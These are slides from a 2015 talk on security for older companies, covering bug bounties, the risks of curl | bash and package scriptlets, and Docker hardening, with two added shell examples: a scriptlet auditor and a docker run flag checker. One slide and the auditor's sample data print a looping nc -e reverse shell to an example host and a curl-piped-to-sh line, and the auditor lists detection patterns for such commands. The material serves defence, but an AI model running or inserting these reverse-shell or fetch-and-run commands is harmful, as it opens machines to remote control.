
Security for non-unicorns

Bea Hughes
September 25, 2015

Operability.io September 2015.

Security is becoming quite the thing nowadays; everyone wants to have one of them. The mantra that things should be built with security in mind and can't be plastered on later is a very important one if you're based in Silicon Valley and are about to write "teh new hotness", but what happens if your company is older than, say, 6 months? You already have some legacy systems and code. I'll be talking about how it's possible to unearth some of these things, what happens when you do uncover them, how to stop them happening, and coping strategies for dealing with them.



  1. Who's this clown?
     • Infrastructure security charlatan at Etsy
     • Operations monkey at Puppet Labs
     • Survived a bunch of startups in London. (some of them still have websites...)
     • Has far too many opinions about pretty much everything on the TwitterNet: @benjammingh
     https://twitter.com/skullmandible/status/411281851131523072
     @benjammingh for Operability.io 2
  2. Setlist
     • The problem(™).
     • The solution(s)(™).
     • The wrap up.
     • Rapturous applause.
     • We all go home/dance parties/our secret lives as superheroes & heroines.
  3. From tiny seeds, do mighty acorns grow.
     • PinkiePwn's 6 small bugs in Chrome to full sandbox escape
     • Egor Homakov's 5 small bugs in GitHub to full private access on GitHub
     • From XSS to remote code execution in under an hour
     • Username & password stolen for HVAC system leads to $160+ Million Target breach.
  4. Computering is hard.
     No. 1 takeaway for security types is a sense of perspective.
  5. Security people aren't great secure coders.
     • Snort: 10 CVEs, Wireshark: 322! CVEs
     • Joxean Koret on Breaking Antivirus software
     • Security Firm Bit9 Hacked, Used to Spread Malware
     • Tavis Ormandy from Project Zero on exploiting ESET
     • BEST! FireEye just running Apache/PHP as root
  6. So who do I trust?
     • No one? Always a great position for security people, who don't want to get paid.
     • Everyone? Do I have a 419 email for YOU!
     • Security vendors? If you have infinite money and no attackers.
     • Attackers!
  7. "You're already being probed for security holes, do you want to know or not?"
  8. Bug bounties 103: The first few weeks will be hell.
  9. curl | bash
     "But this is no worse than packages."
     root# yum install sketchy
  10. curl | bash
      root# rpm -qp --scripts sketchy-1.33-7.rpm
      preinstall scriptlet (using /bin/sh):
      bash -c 'while : ; \
        do \
          nc -e /bin/sh root.legit.pw 2222 ;\
        done'
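The slide's point is that a package's pre/post-install scriptlets run as root just as a piped-in script would, but the package can at least be inspected before it runs. What follows is an added example, not from the talk: a small POSIX sh audit that reads `rpm -qp --scripts` output and flags reverse shells, `curl | sh` chains and similar before `yum install` gets to run them. The `sketchy` package name is the slide's hypothetical; the scriptlet text is constructed here to mirror the slide (a looping `nc -e` reverse shell) plus one benign line and one `curl | sh` line. The URL and file names in the wrappers are placeholders.

```shell
#!/bin/sh
# Added example, not from the talk: audit RPM scriptlets before they run as root.

# POSIX ERE patterns that have no business in a package scriptlet.
SUSPICIOUS='(^|[[:space:];&|(])(nc|ncat|netcat|socat)[[:space:]]'
SUSPICIOUS="$SUSPICIOUS|/dev/tcp/"
SUSPICIOUS="$SUSPICIOUS|(curl|wget)[^|]*[|][[:space:]]*(ba|da|z)?sh"
SUSPICIOUS="$SUSPICIOUS|base64[[:space:]]+(-d|--decode)"
SUSPICIOUS="$SUSPICIOUS|chmod[[:space:]][^;&|]*[+]s"
SUSPICIOUS="$SUSPICIOUS|authorized_keys|/etc/sudoers|crontab|useradd"

# Constructed stand-in for the output of: rpm -qp --scripts sketchy-1.33-7.rpm
sample_scripts() {
cat <<'EOF'
preinstall scriptlet (using /bin/sh):
bash -c 'while : ; do nc -e /bin/sh root.legit.pw 2222 ; done'
postinstall scriptlet (using /bin/sh):
/sbin/ldconfig
curl -sL http://updates.example.invalid/post.sh | sh
EOF
}

# Reads `rpm -qp --scripts` output on stdin. Prints one line per hit, tagged
# with the scriptlet it sits in, and returns 1 if anything matched (so it can
# gate an install), 0 if the scriptlets look clean.
audit_scriptlets() {
    section='(no header)'
    found=0
    while IFS= read -r line; do
        case "$line" in
            # "preinstall scriptlet (using /bin/sh):" style header lines
            *" scriptlet (using "*) section=${line%% scriptlet*}; continue ;;
        esac
        if printf '%s\n' "$line" | grep -Eq "$SUSPICIOUS"; then
            printf 'SUSPICIOUS [%s]: %s\n' "$section" "$line"
            found=1
        fi
    done
    return $found
}

# Real-package wrapper (needs rpm; not exercised offline). Hypothetical usage:
#   audit_package sketchy-1.33-7.rpm && yum install ./sketchy-1.33-7.rpm
audit_package() {
    rpm -qp --scripts "$1" | audit_scriptlets
}

# The same check applied to the curl|bash case: fetch to a file, audit it,
# and only then decide whether to run it. $1 is a hypothetical URL, $2 a path.
fetch_and_audit() {
    curl -fsSL "$1" -o "$2" && audit_scriptlets < "$2"
}
```

Run `sample_scripts | audit_scriptlets` to see the two hits (the `nc -e` loop in the preinstall scriptlet and the `curl | sh` in the postinstall one); `/sbin/ldconfig` passes. The pattern list is a starting point, not a boundary: a scriptlet that does nothing but `chmod +s` a binary or append to `authorized_keys` is flagged too, and anything the list misses is still root code you chose to run.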
  11. ">30% of Images in Docker Hub Contain High Priority Security Vulns"
      - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps
  12. But is Docker itself secure?
      • Don't run things as root.
      • No really, stop running things as root.
      • Did I mention not running things as root.
      • It is also not 1999. (Docker 1.8 addresses some of this, with its changes to who it runs as)
  13. Securify the Docker.
      • Don't use --privileged.
      • Use --cap-drop all and then --cap-add <thing> to get back to the minimum capabilities.
      • Use Docker Notary
      • Use GRSecurity (just do that anyway, if you can.)
      • Use SELinux... I may as well ask for a pony here.
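Slides 12 and 13 give the checklist; this added example (not from the talk) shows what it looks like on the command line: a weak `docker run` beside a hardened one, plus a checker that flags the misses in any `docker run` line pulled out of a deploy script or CI config. The image name, port and uid are hypothetical. `--user` implements "don't run as root" (the same thing `USER` in a Dockerfile does), `--cap-drop ALL --cap-add NET_BIND_SERVICE` is the slide's capability advice, and `DOCKER_CONTENT_TRUST=1` is the Docker 1.8 client switch for Notary-backed content trust; `--read-only` and `--tmpfs` go one step beyond the slide.

```shell
#!/bin/sh
# Added example, not from the talk: weak vs hardened `docker run`, plus a
# checker for the "Securify the Docker" items. Image/port/uid are hypothetical.

# What "it's still 1999" looks like: root inside the container, every
# capability, every host device.
WEAK_RUN='docker run -d --privileged -p 80:80 example/webapp:1.0'

# Least privilege: non-root uid, every capability dropped and only the one
# the service needs added back, read-only rootfs, content trust on the pull.
HARDENED_RUN='DOCKER_CONTENT_TRUST=1 docker run -d \
  --user 10001:10001 \
  --cap-drop ALL --cap-add NET_BIND_SERVICE \
  --read-only --tmpfs /tmp \
  -p 80:80 example/webapp:1.0'

# Collapse a (possibly backslash-continued) command line to single spaces.
flatten_cmd() {
    printf '%s' "$1" | tr -d '\\\n' | tr -s ' '
}

# Prints one FINDING per checklist miss and returns the number of misses,
# so 0 means the line passes and a non-zero status fails a CI step.
check_docker_run() {
    cmd=" $(flatten_cmd "$1") "
    misses=0
    case "$cmd" in
        *" --privileged "*)
            echo "FINDING: --privileged grants all capabilities and host devices"
            misses=$((misses + 1)) ;;
    esac
    case "$cmd" in
        *" --cap-drop ALL "*|*" --cap-drop=ALL "*|*" --cap-drop all "*|*" --cap-drop=all "*) ;;
        *)  echo "FINDING: no --cap-drop ALL; Docker's default capability set stays"
            misses=$((misses + 1)) ;;
    esac
    case "$cmd" in
        *" --cap-add ALL "*|*" --cap-add=ALL "*|*" --cap-add SYS_ADMIN "*|*" --cap-add=SYS_ADMIN "*)
            echo "FINDING: --cap-add ALL/SYS_ADMIN hands most of --privileged back"
            misses=$((misses + 1)) ;;
    esac
    case "$cmd" in
        *" --user "*|*" --user="*|*" -u "*) ;;
        *)  echo "FINDING: no --user; the process runs as root inside the container"
            misses=$((misses + 1)) ;;
    esac
    return $misses
}
```

`check_docker_run "$WEAK_RUN"` reports three misses (privileged, no cap-drop, no user) and returns 3; the hardened line returns 0. The checker is deliberately dumb string matching over the flags, which is enough for a pre-merge hook; it does not know what the image's `USER` is, so a Dockerfile that already drops to a non-root uid will still be told to add `--user`, and that is the one finding worth waiving.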
  14. Summary
      • Computers are apparently hard.
      • Security is clearly harder still, obv.
      • Actually trust and humans is hard.
      • The typing is the easy bit. (ish)
  15. More Summary
      • Complex systems lead to much more complex security problems. (see OAuth)
      • Annual pen-tests don't scale, bug bounties can.
      • Attackers are mining any public info you have (GitHub, S3)
      • I beg you to stop trusting curl.
      • Docker and security can be used in the same sentence.
  16. Thank you!
      Twidder: @benjammingh
      LinkedIn: lnkdin.me/p/benyeah
      FidoNet: 2:254/524.13
      JitHub: github.com/barn
      SpeakerDeck: speakerdeck.com/barnbarn
      Etsy: Careers CodeAsCraft